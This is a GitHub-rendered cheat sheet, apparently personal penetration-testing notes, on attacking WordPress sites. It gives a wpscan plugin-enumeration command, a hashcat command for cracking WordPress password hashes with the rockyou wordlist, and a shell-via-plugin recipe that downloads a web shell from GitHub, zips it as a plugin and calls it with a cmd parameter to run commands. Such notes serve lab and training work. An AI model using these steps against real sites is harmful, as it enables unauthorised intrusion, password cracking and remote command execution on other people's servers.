Skip to content

Latest commit

 

History

History
19 lines (16 loc) · 534 Bytes

File metadata and controls

19 lines (16 loc) · 534 Bytes

Wordpress

wpscan

  • IF THERE IS NOT EVEN VULNERABILITY IN PLUGINS, GET and SERACH THEIR NAMES MANUALLY ON GOOGLE
wpscan --url <url> --enumerate ap --api-token <api-token>

hashcat

hashcat -m 400 -a 0 -o cracked.txt  hash.txt /usr/share/wordlists/rockyou.txt

Shell via Plugin

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Web-Shells/WordPress/plugin-shell.php
zip plugin-shell.zip plugin-shell.php
http://<url>/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami